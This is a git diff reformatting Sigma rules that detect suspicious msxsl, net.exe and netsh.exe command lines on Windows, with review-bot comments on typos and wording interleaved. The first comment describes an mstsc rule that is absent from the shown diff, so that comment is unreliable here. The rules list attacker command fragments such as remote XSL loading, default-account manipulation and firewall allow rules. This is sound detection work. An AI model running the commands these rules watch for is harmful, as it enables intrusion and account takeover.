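Review bot: The description in the first hunk, `Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.`, is copied from the susp_location rule and does not describe this one: the detection here is `selection_parent` (browsers and outlook.exe) plus `selection_img` (mstsc.exe), with no `.rdp` or path condition at all. The title, Mstsc.EXE Execution From Uncommon Parent, is the accurate one. I would change the line to `description: Detects "mstsc.exe" being launched by an uncommon parent such as a web browser or an email client, which may indicate a user opening a downloaded RDP connection file.`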
@@ -1,14 +1,9 @@ title: Msxsl.EXE Execution id: 9e50a8b3-dd05-4eb8-9153-bdb6b79d50b0 status: test -description: 'Detects the execution of the MSXSL utility. This can be used to execute - Extensible Stylesheet Language (XSL) files. These files are commonly used to describe - the processing and rendering of data within XML files. - - Adversaries can abuse this functionality to execute arbitrary files while potentially - bypassing application whitelisting defenses. - - ' +description: | + Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files. + Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/ @@ -26,9 +21,10 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \msxsl.exe + NewProcessName|endswith: \msxsl.exe condition: process_creation and selection falsepositives: - Msxsl is not installed by default and is deprecated, so unlikely on most systems. +# Note: If you levreage this utility please consider adding additional filters. As this is looking for "any" type of execition level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_msxsl_remote_execution.yml b/sigma/builtin/process_creation/proc_creation_win_msxsl_remote_execution.yml index 03f13fc96..cb9dbc6f9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_msxsl_remote_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_msxsl_remote_execution.yml 
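Review bot: The comment added at the end of the second hunk has two typos (`levreage`, `execition`) and reads as two fragments. I would rewrite it as `# Note: If you leverage this utility, consider adding additional filters, as this rule looks for "any" execution of msxsl.exe.` Placing it directly under the `falsepositives:` entry it qualifies, rather than between that list and `level:`, would also make clearer what it refers to.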
@@ -1,8 +1,7 @@ title: Remote XSL Execution Via Msxsl.EXE id: 75d0a94e-6252-448d-a7be-d953dff527bb status: experimental -description: Detects the execution of the "msxsl" binary with an "http" keyword in - the command line. This might indicate a potential remote execution of XSL files. +description: Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/ @@ -19,8 +18,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: http - NewProcessName|endswith: \msxsl.exe + CommandLine|contains: http + NewProcessName|endswith: \msxsl.exe condition: process_creation and selection falsepositives: - Msxsl is not installed by default and is deprecated, so unlikely on most systems. diff --git a/sigma/builtin/process_creation/proc_creation_win_net_default_accounts_manipulation.yml b/sigma/builtin/process_creation/proc_creation_win_net_default_accounts_manipulation.yml index 930366678..960899977 100644 --- a/sigma/builtin/process_creation/proc_creation_win_net_default_accounts_manipulation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_net_default_accounts_manipulation.yml 
@@ -1,8 +1,7 @@ title: Suspicious Manipulation Of Default Accounts Via Net.EXE id: 5b768e71-86f2-4879-b448-81061cbae951 status: test -description: Detects suspicious manipulations of default accounts such as 'administrator' - and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc +description: Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc references: - https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html - https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/ 
@@ -21,54 +20,53 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - NewProcessName|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_user_option: - CommandLine|contains: ' user ' + CommandLine|contains: ' user ' selection_username: - CommandLine|contains: - - " J\xE4rjestelm\xE4nvalvoja " - - ' Rendszergazda ' - - " \u0410\u0434\u043C\u0438\u043D\u0438\u0441\u0442\u0440\u0430\u0442\ - \u043E\u0440 " - - ' Administrateur ' - - ' Administrador ' - - " Administrat\xF6r " - - ' Administrator ' + CommandLine|contains: + # Note: We need to write the full account name for cases starting with 'admin' to avoid lookups only with the user flag + - ' Järjestelmänvalvoja ' # Finish + - ' Rendszergazda ' # Hungarian + - ' Администратор ' # Russian + - ' Administrateur ' # French + - ' Administrador ' # Portuguese (Brazil + Portugal) + Spanish + - ' Administratör ' # Swedish + - ' Administrator ' # English - ' guest ' - ' DefaultAccount ' - - " \"J\xE4rjestelm\xE4nvalvoja\" " - - ' "Rendszergazda" ' - - " \"\u0410\u0434\u043C\u0438\u043D\u0438\u0441\u0442\u0440\u0430\u0442\ - \u043E\u0440\" " - - ' "Administrateur" ' - - ' "Administrador" ' - - " \"Administrat\xF6r\" " - - ' "Administrator" ' + # The cases below are for when an attacker requests the net command via 'cmd /c....' 
+ # First in double quotes + - ' "Järjestelmänvalvoja" ' # Finish + - ' "Rendszergazda" ' # Hungarian + - ' "Администратор" ' # Russian + - ' "Administrateur" ' # French + - ' "Administrador" ' # Portuguese (Brazil + Portugal) + Spanish + - ' "Administratör" ' # Swedish + - ' "Administrator" ' # English - ' "guest" ' - ' "DefaultAccount" ' - - " 'J\xE4rjestelm\xE4nvalvoja' " - - ' ''Rendszergazda'' ' - - " '\u0410\u0434\u043C\u0438\u043D\u0438\u0441\u0442\u0440\u0430\u0442\ - \u043E\u0440' " - - ' ''Administrateur'' ' - - ' ''Administrador'' ' - - " 'Administrat\xF6r' " - - ' ''Administrator'' ' - - ' ''guest'' ' - - ' ''DefaultAccount'' ' + # Second in single quotes + - " 'Järjestelmänvalvoja' " # Finish + - " 'Rendszergazda' " # Hungarian + - " 'Администратор' " # Russian + - " 'Administrateur' " # French + - " 'Administrador' " # Portuguese (Brazil + Portugal) + Spanish + - " 'Administratör' " # Swedish + - " 'Administrator' " # English + - " 'guest' " + - " 'DefaultAccount' " filter: - CommandLine|contains|all: + CommandLine|contains|all: - guest - /active no condition: process_creation and (all of selection_* and not filter) falsepositives: - - Some false positives could occur with the admin or guest account. It depends - on the scripts being used by the admins in your env. If you experience a lot - of FP you could reduce the level to medium + - Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml b/sigma/builtin/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml index 61f8ec46f..37097413d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml 
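Review bot: The language annotations added in this hunk spell the language as `# Finish` three times (the Järjestelmänvalvoja entries in all three quoting variants); it should be `# Finnish`. The note at the top of selection_username, `We need to write the full account name for cases starting with 'admin' to avoid lookups only with the user flag`, is hard to parse; if I read it right it means the full name is used instead of a bare 'admin' substring so that plain `net user` listings are not matched, and I would say so: `# Note: full account names are used instead of an 'admin' substring so that plain 'net user' listings do not trigger the rule`. Separately, the hunk replaces the `\xE4`/`\uXXXX` escapes with literal characters, which is only equivalent if the file is stored as UTF-8; I assume the export tooling guarantees that.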
@@ -1,14 +1,12 @@ title: Suspicious Group And Account Reconnaissance Activity Using Net.EXE id: d95de845-b83c-4a9a-8a6a-4fc802ebf6c0 status: test -description: Detects suspicious reconnaissance command line activity on Windows systems - using Net.EXE +description: Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE references: - https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/ - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/ -author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali - (Nextron Systems) +author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems) date: 2019/01/16 modified: 2023/03/02 tags: 
@@ -23,35 +21,38 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - NewProcessName|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe + # Covers group and localgroup flags selection_group_root: - CommandLine|contains: + CommandLine|contains: - ' group ' - ' localgroup ' selection_group_flags: - CommandLine|contains: + CommandLine|contains: + # Add more groups for other languages - domain admins - - ' administrator' - - ' administrateur' + - ' administrator' # Typo without an 'S' so we catch both + - ' administrateur' # Typo without an 'S' so we catch both - enterprise admins - Exchange Trusted Subsystem - Remote Desktop Users - - "Utilisateurs du Bureau \xE0 distance" - - Usuarios de escritorio remoto - - ' /do' + - Utilisateurs du Bureau à distance # French for "Remote Desktop Users" + - Usuarios de escritorio remoto # Spanish for "Remote Desktop Users" + - ' /do' # short for domain filter_group_add: - CommandLine|contains: ' /add' + # This filter is added to avoid the potential case where the point is not recon but addition + CommandLine|contains: ' /add' + # Covers 'accounts' flag selection_accounts_root: - CommandLine|contains: ' accounts ' + CommandLine|contains: ' accounts ' selection_accounts_flags: - CommandLine|contains: ' /do' - condition: process_creation and (selection_img and ((all of selection_group_* - and not filter_group_add) or all of selection_accounts_*)) + CommandLine|contains: ' /do' # short for domain + condition: process_creation and (selection_img and ((all of selection_group_* and not filter_group_add) or all of selection_accounts_*)) fields: - CommandLine - ParentCommandLine 
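Review bot: The two comments `# Typo without an 'S' so we catch both` on `' administrator'` and `' administrateur'` describe a deliberate prefix match as a typo, which invites a later "fix" that would narrow the rule to the plural form only. I would write `# Intentionally without the trailing 's' so both 'administrator(s)' and 'administrateur(s)' match`. The new `# Covers group and localgroup flags` and `# Covers 'accounts' flag` comments sit above the selection_* keys, which is valid YAML but reads as if they annotate the preceding block; placing each as the first line under the key it describes would be clearer.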
@@ -60,6 +61,5 @@ falsepositives: - Administrative activity level: medium analysis: - recommendation: Check if the user that executed the commands is suspicious (e.g. - service accounts, LOCAL_SYSTEM) + recommendation: Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM) ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_net_network_connections_discovery.yml b/sigma/builtin/process_creation/proc_creation_win_net_network_connections_discovery.yml index 1c94ce4de..f0a893581 100644 --- a/sigma/builtin/process_creation/proc_creation_win_net_network_connections_discovery.yml +++ b/sigma/builtin/process_creation/proc_creation_win_net_network_connections_discovery.yml @@ -1,9 +1,7 @@ title: System Network Connections Discovery Via Net.EXE id: 1c67a717-32ba-409b-a45d-0fb704a73a81 status: test -description: Adversaries may attempt to get a listing of network connections to or - from the compromised system they are currently accessing or from remote systems - by querying for information over the network. +description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery author: frack113 
@@ -20,19 +18,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - NewProcessName|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - - CommandLine|endswith: - - ' use' - - ' sessions' - - CommandLine|contains: - - ' use ' - - ' sessions ' + - CommandLine|endswith: + - ' use' + - ' sessions' + - CommandLine|contains: + - ' use ' + - ' sessions ' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_net_share_and_sessions_enum.yml b/sigma/builtin/process_creation/proc_creation_win_net_share_and_sessions_enum.yml index 03fb03f76..26c1b8374 100644 --- a/sigma/builtin/process_creation/proc_creation_win_net_share_and_sessions_enum.yml +++ b/sigma/builtin/process_creation/proc_creation_win_net_share_and_sessions_enum.yml @@ -1,8 +1,7 @@ title: Share And Session Enumeration Using Net.EXE id: 62510e69-616b-4078-b371-847da438cc03 status: stable -description: Detects attempts to enumerate file shares, printer shares and sessions - using "net.exe" with the "view" flag. +description: Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag. references: - https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md 
@@ -20,16 +19,16 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith:
- - \net.exe
- - \net1.exe
- - OriginalFileName:
- - net.exe
- - net1.exe
+ - NewProcessName|endswith:
+ - \net.exe
+ - \net1.exe
+ - OriginalFileName:
+ - net.exe
+ - net1.exe
 selection_cli:
- CommandLine|contains: view
+ CommandLine|contains: view
 filter:
- CommandLine|contains: \\\\
+ CommandLine|contains: \\\\
 condition: process_creation and (all of selection_* and not filter)
 fields:
 - SubjectUserName
diff --git a/sigma/builtin/process_creation/proc_creation_win_net_share_unmount.yml b/sigma/builtin/process_creation/proc_creation_win_net_share_unmount.yml
index d8db8556f..a24850ecd 100644
--- a/sigma/builtin/process_creation/proc_creation_win_net_share_unmount.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_net_share_unmount.yml
@@ -1,9 +1,7 @@
 title: Unmount Share Via Net.EXE
 id: cb7c4a03-2871-43c0-9bbb-18bbdb079896
 status: test
-description: Detects when when a mounted share is removed. Adversaries may remove
- share connections that are no longer useful in order to clean up traces of their
- operation
+description: Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md
 author: oscd.community, @redcanary, Zach Stanford @svch0st
@@ -20,14 +18,14 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith:
- - \net.exe
- - \net1.exe
- - OriginalFileName:
- - net.exe
- - net1.exe
+ - NewProcessName|endswith:
+ - \net.exe
+ - \net1.exe
+ - OriginalFileName:
+ - net.exe
+ - net1.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - share
 - /delete
 condition: process_creation and (all of selection*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_net_start_service.yml b/sigma/builtin/process_creation/proc_creation_win_net_start_service.yml
index 99cd11875..c60ac8531 100644
--- a/sigma/builtin/process_creation/proc_creation_win_net_start_service.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_net_start_service.yml
@@ -1,8 +1,7 @@
 title: Start Windows Service Via Net.EXE
 id: 2a072a96-a086-49fa-bcb5-15cc5a619093
 status: test
-description: Detects the usage of the "net.exe" command to start a service using the
- "start" flag
+description: Detects the usage of the "net.exe" command to start a service using the "start" flag
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md
 author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
@@ -19,14 +18,14 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith:
- - \net.exe
- - \net1.exe
- - OriginalFileName:
- - net.exe
- - net1.exe
+ - NewProcessName|endswith:
+ - \net.exe
+ - \net1.exe
+ - OriginalFileName:
+ - net.exe
+ - net1.exe
 selection_cli:
- CommandLine|contains: ' start '
+ CommandLine|contains: ' start ' # space character after the 'start' keyword indicates that a service name follows, in contrast to `net start` discovery expression
 condition: process_creation and (all of selection_*)
 falsepositives:
 - Legitimate administrator or user executes a service for legitimate reasons.
diff --git a/sigma/builtin/process_creation/proc_creation_win_net_stop_service.yml b/sigma/builtin/process_creation/proc_creation_win_net_stop_service.yml
index b6a7e0c89..8b8c518cf 100644
--- a/sigma/builtin/process_creation/proc_creation_win_net_stop_service.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_net_stop_service.yml
@@ -1,8 +1,8 @@
 title: Stop Windows Service Via Net.EXE
 id: 88872991-7445-4a22-90b2-a3adadb0e827
 related:
- - id: eb87818d-db5d-49cc-a987-d5da331fbd90
- type: obsoletes
+ - id: eb87818d-db5d-49cc-a987-d5da331fbd90
+ type: obsoletes
 status: test
 description: Detects the stopping of a Windows service
 author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
@@ -18,17 +18,16 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - OriginalFileName:
- - net.exe
- - net1.exe
- - NewProcessName|endswith:
- - \net.exe
- - \net1.exe
+ - OriginalFileName:
+ - net.exe
+ - net1.exe
+ - NewProcessName|endswith:
+ - \net.exe
+ - \net1.exe
 selection_cli:
- CommandLine|contains: ' stop '
+ CommandLine|contains: ' stop '
 condition: process_creation and (all of selection_*)
 falsepositives:
- - There are many legitimate reasons to stop a service. This rule isn't looking
- for any suspicious behaviour in particular. Filter legitimate activity accordingly
+ - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly
 level: low
 ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_net_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_net_susp_execution.yml
index d3987f0b0..77c15a1d8 100644
--- a/sigma/builtin/process_creation/proc_creation_win_net_susp_execution.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_net_susp_execution.yml
@@ -8,8 +8,7 @@ references:
 - https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html
 - https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe
-author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community
- (improvements)
+author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)
 date: 2019/01/16
 modified: 2022/07/11
 tags:
@@ -34,14 +33,14 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith:
- - \net.exe
- - \net1.exe
- - OriginalFileName:
- - net.exe
- - net1.exe
+ - NewProcessName|endswith:
+ - \net.exe
+ - \net1.exe
+ - OriginalFileName:
+ - net.exe
+ - net1.exe
 selection_cli:
- CommandLine|contains:
+ CommandLine|contains:
 - ' group'
 - ' localgroup'
 - ' user'
@@ -57,7 +56,6 @@ fields:
 - CommandLine
 - ParentCommandLine
 falsepositives:
- - Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine
- following the search for easy hunting by computer/CommandLine.
+ - Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine.
 level: low
 ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_net_use_mount_admin_share.yml b/sigma/builtin/process_creation/proc_creation_win_net_use_mount_admin_share.yml
index bf3a9a747..7b3e60ac0 100644
--- a/sigma/builtin/process_creation/proc_creation_win_net_use_mount_admin_share.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_net_use_mount_admin_share.yml
@@ -1,14 +1,13 @@
 title: Windows Admin Share Mount Via Net.EXE
 id: 3abd6094-7027-475f-9630-8ab9be7b9725
 related:
- - id: f117933c-980c-4f78-b384-e3d838111165
- type: similar
+ - id: f117933c-980c-4f78-b384-e3d838111165
+ type: similar
 status: test
 description: Detects when an admin share is mounted using net.exe
 references:
 - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view
-author: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st,
- wagga
+author: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga
 date: 2020/10/05
 modified: 2023/02/21
 tags:
@@ -22,14 +21,14 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith:
- - \net.exe
- - \net1.exe
- - OriginalFileName:
- - net.exe
- - net1.exe
+ - NewProcessName|endswith:
+ - \net.exe
+ - \net1.exe
+ - OriginalFileName:
+ - net.exe
+ - net1.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - ' use '
 - ' \\\\*\\*$'
 condition: process_creation and (all of selection_*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_net_use_mount_internet_share.yml b/sigma/builtin/process_creation/proc_creation_win_net_use_mount_internet_share.yml
index c23164aeb..fc6d42312 100644
--- a/sigma/builtin/process_creation/proc_creation_win_net_use_mount_internet_share.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_net_use_mount_internet_share.yml
@@ -1,8 +1,7 @@
 title: Windows Internet Hosted WebDav Share Mount Via Net.EXE
 id: 7e6237fe-3ddb-438f-9381-9bf9de5af8d0
 status: experimental
-description: Detects when an internet hosted webdav share is mounted using the "net.exe"
- utility
+description: Detects when an internet hosted webdav share is mounted using the "net.exe" utility
 references:
 - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -19,14 +18,14 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith:
- - \net.exe
- - \net1.exe
- - OriginalFileName:
- - net.exe
- - net1.exe
+ - NewProcessName|endswith:
+ - \net.exe
+ - \net1.exe
+ - OriginalFileName:
+ - net.exe
+ - net1.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - ' use '
 - ' http'
 condition: process_creation and (all of selection_*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_net_use_mount_share.yml b/sigma/builtin/process_creation/proc_creation_win_net_use_mount_share.yml
index 793713046..a88437bab 100644
--- a/sigma/builtin/process_creation/proc_creation_win_net_use_mount_share.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_net_use_mount_share.yml
@@ -1,8 +1,8 @@
 title: Windows Share Mount Via Net.EXE
 id: f117933c-980c-4f78-b384-e3d838111165
 related:
- - id: 3abd6094-7027-475f-9630-8ab9be7b9725
- type: similar
+ - id: 3abd6094-7027-475f-9630-8ab9be7b9725
+ type: similar
 status: test
 description: Detects when a share is mounted using the "net.exe" utility
 references:
@@ -21,14 +21,14 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith:
- - \net.exe
- - \net1.exe
- - OriginalFileName:
- - net.exe
- - net1.exe
+ - NewProcessName|endswith:
+ - \net.exe
+ - \net1.exe
+ - OriginalFileName:
+ - net.exe
+ - net1.exe
 selection_cli:
- CommandLine|contains:
+ CommandLine|contains:
 - ' use '
 - ' \\\\'
 condition: process_creation and (all of selection_*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_net_use_password_plaintext.yml b/sigma/builtin/process_creation/proc_creation_win_net_use_password_plaintext.yml
index 0119f8299..1091da1f8 100644
--- a/sigma/builtin/process_creation/proc_creation_win_net_use_password_plaintext.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_net_use_password_plaintext.yml
@@ -23,19 +23,19 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith:
- - \net.exe
- - \net1.exe
- - OriginalFileName:
- - net.exe
- - net1.exe
+ - NewProcessName|endswith:
+ - \net.exe
+ - \net1.exe
+ - OriginalFileName:
+ - net.exe
+ - net1.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - ' use '
 - :*\\
 - /USER:* *
 filter_empty:
- CommandLine|endswith: ' '
+ CommandLine|endswith: ' '
 condition: process_creation and (all of selection_* and not 1 of filter*)
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_net_user_add.yml b/sigma/builtin/process_creation/proc_creation_win_net_user_add.yml
index e4f72fd2e..cbe817c04 100644
--- a/sigma/builtin/process_creation/proc_creation_win_net_user_add.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_net_user_add.yml
@@ -1,8 +1,8 @@
 title: New User Created Via Net.EXE
 id: cd219ff3-fa99-45d4-8380-a7d15116c6dc
 related:
- - id: b9f0e6f5-09b4-4358-bae4-08408705bd5c
- type: similar
+ - id: b9f0e6f5-09b4-4358-bae4-08408705bd5c
+ type: similar
 status: test
 description: Identifies the creation of local users via the net.exe command.
 references:
@@ -22,14 +22,14 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith:
- - \net.exe
- - \net1.exe
- - OriginalFileName:
- - net.exe
- - net1.exe
+ - NewProcessName|endswith:
+ - \net.exe
+ - \net1.exe
+ - OriginalFileName:
+ - net.exe
+ - net1.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - user
 - add
 condition: process_creation and (all of selection_*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_net_user_add_never_expire.yml b/sigma/builtin/process_creation/proc_creation_win_net_user_add_never_expire.yml
index 11aad919f..3eddb5323 100644
--- a/sigma/builtin/process_creation/proc_creation_win_net_user_add_never_expire.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_net_user_add_never_expire.yml
@@ -1,11 +1,10 @@
 title: New User Created Via Net.EXE With Never Expire Option
 id: b9f0e6f5-09b4-4358-bae4-08408705bd5c
 related:
- - id: cd219ff3-fa99-45d4-8380-a7d15116c6dc
- type: derived
+ - id: cd219ff3-fa99-45d4-8380-a7d15116c6dc
+ type: derived
 status: test
-description: Detects creation of local users via the net.exe command with the option
- "never expire"
+description: Detects creation of local users via the net.exe command with the option "never expire"
 references:
 - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -22,14 +21,14 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith:
- - \net.exe
- - \net1.exe
- - OriginalFileName:
- - net.exe
- - net1.exe
+ - NewProcessName|endswith:
+ - \net.exe
+ - \net1.exe
+ - OriginalFileName:
+ - net.exe
+ - net1.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - user
 - add
 - expires:never
diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_add_rule.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_add_rule.yml
index 987ca3ba0..e088d772d 100644
--- a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_add_rule.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_add_rule.yml
@@ -19,18 +19,16 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \netsh.exe
- - OriginalFileName: netsh.exe
+ - NewProcessName|endswith: \netsh.exe
+ - OriginalFileName: netsh.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - ' firewall '
 - ' add '
 filter_optional_dropbox:
- CommandLine|contains:
- - advfirewall firewall add rule name=Dropbox dir=in action=allow "program=?:\Program
- Files (x86)\Dropbox\Client\Dropbox.exe" enable=yes profile=Any
- - advfirewall firewall add rule name=Dropbox dir=in action=allow "program=?:\Program
- Files\Dropbox\Client\Dropbox.exe" enable=yes profile=Any
+ CommandLine|contains:
+ - advfirewall firewall add rule name=Dropbox dir=in action=allow "program=?:\Program Files (x86)\Dropbox\Client\Dropbox.exe" enable=yes profile=Any
+ - advfirewall firewall add rule name=Dropbox dir=in action=allow "program=?:\Program Files\Dropbox\Client\Dropbox.exe" enable=yes profile=Any
 condition: process_creation and (all of selection_* and not 1 of filter_optional_*)
 falsepositives:
 - Legitimate administration activity
diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml
index daf355183..829368a4c 100644
--- a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml
@@ -1,8 +1,7 @@
 title: Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE
 id: a35f5a72-f347-4e36-8895-9869b0d5fc6d
 status: test
-description: Detects Netsh command execution that whitelists a program located in
- a suspicious location in the Windows Firewall
+description: Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall
 references:
 - https://www.virusradar.com/en/Win32_Kasidet.AD/description
 - https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100
@@ -20,22 +19,22 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \netsh.exe
- - OriginalFileName: netsh.exe
+ - NewProcessName|endswith: \netsh.exe
+ - OriginalFileName: netsh.exe
 selection_cli:
- - CommandLine|contains|all:
- - firewall
- - add
- - allowedprogram
- - CommandLine|contains|all:
- - advfirewall
- - firewall
- - add
- - rule
- - action=allow
- - program=
+ - CommandLine|contains|all:
+ - firewall
+ - add
+ - allowedprogram
+ - CommandLine|contains|all:
+ - advfirewall
+ - firewall
+ - add
+ - rule
+ - action=allow
+ - program=
 selection_paths:
